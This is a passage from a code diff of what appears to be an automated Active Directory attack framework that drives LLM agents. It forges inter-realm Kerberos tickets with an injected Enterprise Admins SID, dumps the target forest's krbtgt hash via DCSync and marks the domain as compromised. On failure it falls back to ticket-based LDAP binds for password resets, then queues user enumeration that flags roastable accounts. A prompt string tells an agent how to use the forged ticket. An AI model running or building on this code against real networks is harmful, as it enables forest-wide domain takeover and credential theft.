+ "dc_ip": &target_dc_ip,
+ });
+ if let Some(ref sid) = source_domain_sid {
+ tool_args["source_sid"] = json!(sid);
+ }
+ if let Some(ref sid) = target_domain_sid {
+ tool_args["target_sid"] = json!(sid);
+ }
+ // AES256 trust key — required for Win2016+ target DCs which
+ // reject RC4-only inter-realm tickets with KDC_ERR_TGT_REVOKED.
+ // resolved_aes_key prefers item.hash.aes_key, then re-reads
+ // state.hashes for an AES-equipped variant (handles the race
+ // where secretsdump's second pass upserts AES after work was
+ // collected).
+ if let Some(ref aes) = resolved_aes_key {
+ tool_args["aes_key"] = json!(aes);
+ }
+ // For child→parent trusts (intra-forest), inject parent's
+ // Enterprise Admins SID (RID 519). SID filtering blocks
+ // ExtraSID across forest trusts, so only emit on intra-forest.
+ // The defer above guarantees target_domain_sid is Some here
+ // when is_child_to_parent.
+ if is_child_to_parent {
+ if let Some(ref tsid) = target_domain_sid {
+ tool_args["extra_sid"] = json!(format!("{tsid}-519"));
+ }
+ }
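+ // Illustrative (made-up SID): target_sid "S-1-5-21-1111-2222-3333"
+ // yields extra_sid "S-1-5-21-1111-2222-3333-519"; 519 is the
+ // well-known RID of the parent forest's Enterprise Admins group.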
+ let _ = ticket_path; // ccache path is internal to the tool
+ let _ = trust_target;
+
+ let call = ToolCall {
+ id: format!("forge_inter_realm_{}", uuid::Uuid::new_v4().simple()),
+ name: "forge_inter_realm_and_dump".to_string(),
+ arguments: tool_args,
+ };
+ let task_id = format!(
+ "trust_forge_{}",
+ &uuid::Uuid::new_v4().simple().to_string()[..12]
+ );
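+ // e.g. "trust_forge_3f9c2b1a7e4d" (illustrative; 12 hex chars of a
+ // simple-format UUID).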
+
+ // Mark dedup BEFORE spawning so the next 30s tick doesn't
+ // re-dispatch the same trust while the forge is running.
dispatcher
.state
.write()
@@ -800,6 +1813,211 @@ pub async fn auto_trust_follow(dispatcher: Arc<Dispatcher>, mut shutdown: watch:
.state
.persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &item.dedup_key)
.await;
+
+ info!(
+ task_id = %task_id,
+ trust_account = %item.hash.username,
+ source_domain = %item.source_domain,
+ target_domain = %item.target_domain,
+ has_source_sid = source_domain_sid.is_some(),
+ has_target_sid = target_domain_sid.is_some(),
+ has_aes = resolved_aes_key.is_some(),
+ "Cross-forest forge dispatched (direct tool, no LLM)"
+ );
+
+ let dispatcher_bg = dispatcher.clone();
+ let source_domain_bg = item.source_domain.clone();
+ let target_domain_bg = item.target_domain.clone();
+ let trust_account_bg = item.hash.username.clone();
+ let vuln_id_bg = vuln_id.clone();
+ let dedup_key_bg = item.dedup_key.clone();
+ let trust_key_bg = item.hash.hash_value.clone();
+ let aes_key_bg = resolved_aes_key.clone();
+ let source_domain_sid_bg = source_domain_sid.clone();
+ tokio::spawn(async move {
+ let result = dispatcher_bg
+ .llm_runner
+ .tool_dispatcher()
+ .dispatch_tool("privesc", &task_id, &call)
+ .await;
+ // Clear dedup on failure so the next 30s tick can retry once
+ // a fresh trust key, AES key, or SID becomes available.
+ let clear_dedup = || async {
+ dispatcher_bg
+ .state
+ .write()
+ .await
+ .unmark_processed(DEDUP_TRUST_FOLLOW, &dedup_key_bg);
+ let _ = dispatcher_bg
+ .state
+ .unpersist_dedup(&dispatcher_bg.queue, DEDUP_TRUST_FOLLOW, &dedup_key_bg)
+ .await;
+ };
+ match result {
+ Ok(exec_result) => {
+ if let Some(err) = exec_result.error.as_ref() {
+ let tail: String = exec_result
+ .output
+ .chars()
+ .rev()
+ .take(2000)
+ .collect::<String>()
+ .chars()
+ .rev()
+ .collect();
+ warn!(
+ err = %err,
+ source_domain = %source_domain_bg,
+ target_domain = %target_domain_bg,
+ trust_account = %trust_account_bg,
+ output_tail = %tail,
+ "forge_inter_realm_and_dump returned error — clearing dedup for retry"
+ );
+ clear_dedup().await;
+ return;
+ }
+ // Verify target compromise — only mark exploited
+ // when we actually observe the target krbtgt hash
+ // in the dispatch_tool discoveries.
+ let target_lower = target_domain_bg.to_lowercase();
+ let has_target_krbtgt = exec_result
+ .discoveries
+ .as_ref()
+ .and_then(|d| d.get("hashes"))
+ .and_then(|h| h.as_array())
+ .map(|hashes| {
+ hashes.iter().any(|h| {
+ let user =
+ h.get("username").and_then(|v| v.as_str()).unwrap_or("");
+ let dom =
+ h.get("domain").and_then(|v| v.as_str()).unwrap_or("");
+ let htype =
+ h.get("hash_type").and_then(|v| v.as_str()).unwrap_or("");
+ user.eq_ignore_ascii_case("krbtgt")
+ && dom.to_lowercase() == target_lower
+ && htype.eq_ignore_ascii_case("ntlm")
+ })
+ })
+ .unwrap_or(false);
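+ // Shape being matched (illustrative): discoveries = {"hashes":
+ //   [{"username": "krbtgt", "domain": "<target>", "hash_type": "NTLM"}]}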
+ if has_target_krbtgt {
+ info!(
+ source_domain = %source_domain_bg,
+ target_domain = %target_domain_bg,
+ "Cross-forest forge compromised target — marking exploited"
+ );
+ let _ = dispatcher_bg
+ .state
+ .mark_exploited(&dispatcher_bg.queue, &vuln_id_bg)
+ .await;
+ let techniques = vec!["T1134.005".to_string(), "T1550.003".to_string()];
+ let event_id = format!(
+ "evt-trust-{}",
+ &uuid::Uuid::new_v4().simple().to_string()[..8]
+ );
+ let event = serde_json::json!({
+ "id": event_id,
+ "timestamp": chrono::Utc::now().to_rfc3339(),
+ "source": "trust_automation",
+ "description": format!(
+ "Forest trust escalation: {} \u{2192} {} via trust key {}",
+ source_domain_bg, target_domain_bg, trust_account_bg
+ ),
+ "mitre_techniques": techniques,
+ });
+ let _ = dispatcher_bg
+ .state
+ .persist_timeline_event(&dispatcher_bg.queue, &event, &techniques)
+ .await;
+ } else {
+ // Tool ran cleanly but no target krbtgt landed in
+ // discoveries — this is a deterministic failure
+ // (SID filtering, denied permissions, or wrong
+ // forest) that won't change on the next 30s tick.
+ // Keep dedup MARKED so we don't relitigate the
+ // doomed forge in a tight loop, leave the trust
+ // vuln unexploited (only a captured target krbtgt
+ // proves compromise; see the warn below), and
+ // wake the cross-forest fallback paths
+ // (ACL/MSSQL/FSP) which can still compromise the
+ // target forest without ExtraSid.
+ //
+ // Surface tool stdout tail + a hash-count summary so
+ // post-mortem can distinguish silent nxc failure
+ // (empty output) from auth-denied (nxc printed
+ // STATUS_LOGON_FAILURE / rpc_s_access_denied) from
+ // partial dumps (got hashes but no krbtgt — usually
+ // a cross-forest no-ExtraSid case where the target
+ // KDC issued a TGS but DRSUAPI rejected replication).
+ let tail: String = exec_result
+ .output
+ .chars()
+ .rev()
+ .take(2000)
+ .collect::<String>()
+ .chars()
+ .rev()
+ .collect();
+ let hash_count = exec_result
+ .discoveries
+ .as_ref()
+ .and_then(|d| d.get("hashes"))
+ .and_then(|h| h.as_array())
+ .map(|a| a.len())
+ .unwrap_or(0);
+ warn!(
+ source_domain = %source_domain_bg,
+ target_domain = %target_domain_bg,
+ hash_count,
+ output_tail = %tail,
+ "forge_inter_realm_and_dump completed but no target krbtgt observed — locking dedup, waking fallbacks (vuln NOT marked exploited; only target krbtgt capture proves compromise)"
+ );
+ let _ = vuln_id_bg; // intentionally unused in this branch — see comment above
+
+ // Dump-phase failure (SID filtering missed by
+ // is_filtered_inter_forest_trust, DRSUAPI denial
+ // despite a valid TGS, or any other reason DCSync
+ // returned 0 hashes) leaves the foreign forest
+ // attackable via Kerberos LDAP bind. Dispatch
+ // create_inter_realm_ticket so downstream tools
+ // (bloodyad -k, etc.) get a usable ccache. Without
+ // this, wake_cross_forest_fallbacks below is a
+ // no-op when no same-realm credential bound the
+ // ACL/foreign-group/cross-forest enums to the
+ // target — the case that left fabrikam.local
+ // permanently un-attackable in op-20260502-013857.
+ {
+ let dispatcher_fb = dispatcher_bg.clone();
+ let source_domain_fb = source_domain_bg.clone();
+ let target_domain_fb = target_domain_bg.clone();
+ let trust_key_fb = trust_key_bg.clone();
+ let aes_key_fb = aes_key_bg.clone();
+ let source_domain_sid_fb = source_domain_sid_bg.clone();
+ tokio::spawn(async move {
+ dispatch_create_inter_realm_ticket(
+ &dispatcher_fb,
+ &source_domain_fb,
+ &target_domain_fb,
+ &trust_key_fb,
+ aes_key_fb.as_deref(),
+ source_domain_sid_fb.as_deref(),
+ )
+ .await;
+ });
+ }
+
+ wake_cross_forest_fallbacks(&dispatcher_bg, &target_domain_bg).await;
+ }
+ }
+ Err(e) => {
+ warn!(
+ err = %e,
+ source_domain = %source_domain_bg,
+ target_domain = %target_domain_bg,
+ "forge_inter_realm_and_dump dispatch errored — clearing dedup for retry"
+ );
+ clear_dedup().await;
+ }
+ }
+ });
}
}
}
@@ -812,7 +2030,311 @@ struct TrustFollowWork {
target_dc_ip: Option<String>,
source_domain_sid: Option<String>,
target_domain_sid: Option<String>,
- source_dc_ip: Option<String>,
+}
+
+/// Submit a cross-forest user-enumeration recon task immediately after a
+/// successful inter-realm ticket forge.
+///
+/// Without this, `auto_cross_forest_enum` would refuse to dispatch (its
+/// `best_cred` returns None when the target forest has no credentials in
+/// state) and the freshly-forged ticket would sit idle. This helper queues
+/// the same `ldap_user_enumeration` recon payload using any usable
+/// source-domain credential as a placeholder; the credential resolver
+/// detects the cross-forest LDAP tool, finds no NTLM hash for the target,
+/// and injects the inter-realm ccache via `resolve_cross_forest_ticket`.
+async fn dispatch_post_ticket_user_enumeration(
+ dispatcher: &Dispatcher,
+ source_domain: &str,
+ target_domain: &str,
+) {
+ let target_lower = target_domain.to_lowercase();
+
+ let (target_dc_ip, target_dc_fqdn, source_cred) = {
+ let s = dispatcher.state.read().await;
+ let Some(dc_ip) = s.resolve_dc_ip(target_domain) else {
+ warn!(
+ source_domain,
+ target_domain, "post-ticket user-enum skipped: no DC IP for target domain"
+ );
+ return;
+ };
+ let dc_fqdn = s
+ .hosts
+ .iter()
+ .find(|h| h.ip == dc_ip && !h.hostname.is_empty())
+ .map(|h| {
+ let hn = h.hostname.to_lowercase();
+ if hn.ends_with(&format!(".{target_lower}")) || hn == target_lower {
+ hn
+ } else {
+ format!("{hn}.{target_lower}")
+ }
+ });
+ // Pick any non-empty-password credential from the source forest. The
+ // resolver will swap the cred for the ticket; what matters is that
+ // bind_domain ends up != target_domain so the cross-forest path is
+ // taken. We accept child-domain creds (e.g. child.contoso.local
+ // when source is contoso.local) because intermediate ops often
+ // only own the child realm — the trust key extraction still uses the
+ // parent's outbound trust, but state.credentials only holds the
+ // identities we cracked along the way.
+ let cred = s
+ .credentials
+ .iter()
+ .find(|c| {
+ !c.password.is_empty()
+ && is_domain_related(&c.domain, source_domain)
+ && !s.is_credential_quarantined(&c.username, &c.domain)
+ })
+ .cloned();
+ (dc_ip, dc_fqdn, cred)
+ };
+
+ let Some(cred) = source_cred else {
+ warn!(
+ source_domain,
+ target_domain,
+ "post-ticket user-enum skipped: no source-domain credential to seed the task"
+ );
+ return;
+ };
+
+ let target = target_dc_fqdn.unwrap_or_else(|| target_dc_ip.clone());
+
+ let payload = json!({
+ "technique": "ldap_user_enumeration",
+ "target_ip": target,
+ "domain": target_domain,
+ "bind_domain": source_domain,
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ "filters": ["(objectCategory=person)(objectClass=user)"],
+ "attributes": [
+ "sAMAccountName", "description", "memberOf",
+ "userAccountControl", "servicePrincipalName",
+ "msDS-AllowedToDelegateTo", "adminCount"
+ ],
+ "cross_forest": true,
+ "instructions": concat!(
+ "Cross-forest user enumeration after inter-realm Kerberos ticket forge. ",
+ "An inter-realm ccache for this target domain has been pre-cached and ",
+ "will be auto-injected by the credential resolver. Use ",
+ "`ldap_search_descriptions` (or `ldap_search`) against the target DC ",
+ "FQDN — these tools perform GSSAPI bind with the injected ticket. Do ",
+ "NOT use the supplied password credential for the bind (it is from a ",
+ "different forest and will be rejected); the ticket handles auth.\n\n",
+ "Report every user found with EXACTLY this JSON format in ",
+ "discovered_users:\n",
+ " {\"username\": \"samaccountname\", \"domain\": \"target.domain\", ",
+ "\"source\": \"ldap_enumeration\", \"memberOf\": [\"Group1\"]}\n",
+ "Flag DoesNotRequirePreAuth as vuln_type='asrep_roastable' and SPNs as ",
+ "vuln_type='kerberoastable'."
+ ),
+ });
+
+ let priority = dispatcher.effective_priority("cross_forest_enum");
+ match dispatcher
+ .throttled_submit("recon", "recon", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ source_domain,
+ target_domain,
+ target_dc = %target,
+ "Post-ticket cross-forest user enumeration dispatched"
+ );
+ }
+ Ok(None) => {
+ debug!(
+ source_domain,
+ target_domain, "Post-ticket user-enum deferred by throttling"
+ );
+ }
+ Err(e) => {
+ warn!(
+ err = %e,
+ source_domain,
+ target_domain,
+ "Failed to submit post-ticket user-enum task"
+ );
+ }
+ }
+}
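+// Hypothetical call-site sketch (domain names illustrative): invoked
+// fire-and-forget from the forge success path, e.g.
+//   dispatch_post_ticket_user_enumeration(&dispatcher, "corp.example", "partner.example").await;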
+
+/// Forge an inter-realm Kerberos ticket for a SID-filtered cross-forest trust.
+///
+/// Called from the suppression branch of `auto_trust_follow` when
+/// `is_filtered_inter_forest_trust` is true. The ExtraSid DCSync path is
+/// blocked by SID filtering, but a plain inter-realm TGT is still useful:
+/// bloodyad with `-k` can perform Kerberos LDAP bind against the target DC
+/// as Administrator, enabling password resets and group membership changes.
+///
+/// The ticket is written to `/tmp/ares-tickets/__